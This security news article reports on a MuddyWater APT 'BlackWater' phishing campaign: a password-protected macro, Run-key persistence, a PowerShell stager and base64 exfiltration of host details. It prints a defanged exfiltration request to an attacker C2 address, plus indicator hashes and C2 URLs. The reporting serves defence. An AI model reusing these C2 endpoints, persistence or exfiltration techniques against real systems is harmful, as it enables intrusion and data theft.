Friday, March 29, 2024

MuddyWater APT’s BlackWater Malware Campaign Install Backdoor on Victims PC to Gain Remote Access & Evade Detection

Researchers discovered a “Blackwater” malware campaign that suspected to associated with well known MuddyWater APT bypass the security control and install a backdoor on Victims PC using MuddyWater’s tactics, techniques, and procedures (TTPs).

MuddyWater involved with a various cyber attack in recent past and its spotted to targeting organizations in Pakistan, Turkey, and Tajikistan using multiple social engineering methods to trick the victims into enabling macros and activate payloads.

Blackwater campaign believed to be a new arsenal of MuddyWater APT since the activities indicate that the threat actors applied many tactics within it to improve its operational security and avoid endpoint detection.

Threat actors using Obfuscated VBA script to establish the persistence mechanism and the VBA script triggered a PowerShell stager, also its a type of method to masquerade as a red-teaming tool.

Backwater also employed a FruityC2 agent script, an open-source framework on GitHub by letting PowerShell stager communicate with C2 server to enumerate the host machine further.

It is one of the methods threat actors employed to make host-based detection more difficult and avoid signature-based detection from Yara rules.

BlackWater Infection Process

Researchers discovered a weaponized document which is being sent to victims via phishing emails with the time stamp that indicates that the document created date on April 23.

Once victims open the malicious document, it required the user to enable the Macro titled “BlackWater.bas”

Threat actors also employed an anti-reverse technique by protecting Macro with a password to inaccessible if a user attempted to view the Macro in Visual Basic.

According to Talos Research, “The macro contains a PowerShell script to persist in the “Run” registry key, “KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding”.

The script then called the file “\ProgramData\SysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.”

This PowerShell agent was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey.

In Blackwater campaign, threat actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file.

Finally PowerShell script Will enumerate the Targeted victims machine to querying following information.

  • Operating system’s name (i.e., the name of the machine)
  • Operating system’s OS architecture
  • Operating system’s caption
  • Computer system’s domain
  • Computer system’s username
  • Computer’s public IP address

Once its enumerate all the information, It proposes the URL post request to a C2 with base64-encoded, whereas in previous versions this information was written to a text file.

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

Later it decode the enumerated data and obtain the stolen data From Victims

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01

Indicators of compromise

Hashes

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad
9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7
0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2
A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da91
6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad
Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6
B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93
4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60
576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf
062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URLs

hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater
hxxp://82[.]102[.]8[.]101/bcerrxy.php?
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/
hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df
hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh
hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Also Read:

Cyber Espionage Campaign Possibly “MuddyWater” Targets Middle East and Central Asia

MuddyWater Malware Attack Launch PowerShell Script to Open Backdoor in Windows PC via MS Word Document

Website

Latest articles

How to Analyse .NET Malware? – Reverse Engineering Snake Keylogger

Utilizing sandbox analysis for behavioral, network, and process examination provides a foundation for reverse...

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles